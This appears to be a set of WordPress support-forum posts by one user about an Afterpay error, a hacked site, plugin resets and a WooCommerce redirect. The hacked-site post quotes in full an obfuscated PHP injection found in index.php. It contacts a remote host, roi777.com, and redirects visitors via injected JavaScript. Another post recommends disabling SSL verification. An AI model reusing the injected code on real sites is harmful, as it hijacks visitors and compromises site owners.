defmans7

We receive the same error.

This is absolutely deplorable…

this is not what support forums are for. Obviously a lot of people are getting this error “Error #403: Transaction not allowed” but your response to every support ticket is contact support – which leaves no help for anyone trying to solve the issue themselves.

Is there a specific reason we need to contact Afterpay support?

What is the result of the support ticket?

Is it something we can solve ourselves as merchants / developers?

Is your plugin just rubbish?

Is Afterpay just a terrible company??

These are all questions I’d love to have answers for at some point this century…

The same thing has been happening to me on multiple sites, many times. I login and Wordfence is indeed de-activated and there are foreign and modified files. Not sure which plugin is causing a vulnerability because I use an array of different plugins for my various clients.

This email was sent from your website "[website name]" by the Wordfence plugin at Saturday 30th of June 2018 at 04:06:44 AM The Wordfence administrative URL for this site is: https://[domain-name].com/wp-admin/admin.php?page=Wordfence
A user with username "[my admin login]" deactivated Wordfence on your WordPress site.
User IP: 192.0.116.208
User hostname: 192.0.116.208
User location: Los Angeles, United States

This is the first I’ve heard of others having the same issue.

A file with this name is usually in the public_html directory “71ba5704c07aec55402cb7d674cb5783”

and index.php usually has some code like this, prepended to it:

<?php
 $id6fe1d0be634 = "/index/?2601510941471";
$z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}

Some links, even within the admin dashboard, redirect to a Baidu redirect, something like this: “http://www.baidu.com/link?url=bEUKnD70IK1cMzRUWPGE3CNBYzcT7EiuMM3p3Uy1LsZUeSgoQWxl9RlBWf_iSgwr”

This one took me to a suspended account, “http://www.hatchy.com.au” – so I’m assuming it’s some type of DDOS attack.

Would love to know the root cause of the vulnerability so I can patch it. So far it’s actually looking like the common thread is Wordfence.

I have encountered the same issue on multiple sites.

Perhaps the plugin should check to see if the package is available (Sucuri plugin can reach the remote repository) before removing the plugin. Or at least have a warning that the plugin you want to reset may not be downloaded where you check the “I understand that this operation can not be reverted” box.

If I find some error log that helps, I will post it here.

Worked Perfectly!

Download a mini Plugin from http://marketpress.com/wp-content/uploads/2014/03/backwpup-disable-ssl-verify.zip with this activateed

Thanks to Daniel Hüsken

Use

<?php if (!is_user_logged_in()) {
    echo "<script>window.location = '/my-account/customer-login/'</script>";
}?>

You can put this in the woocommerce shop page override.

Headers can’t be sent again but you can Javascript all the things! It’s not pretty but hopefully this solution helps someone that might have been in my situation.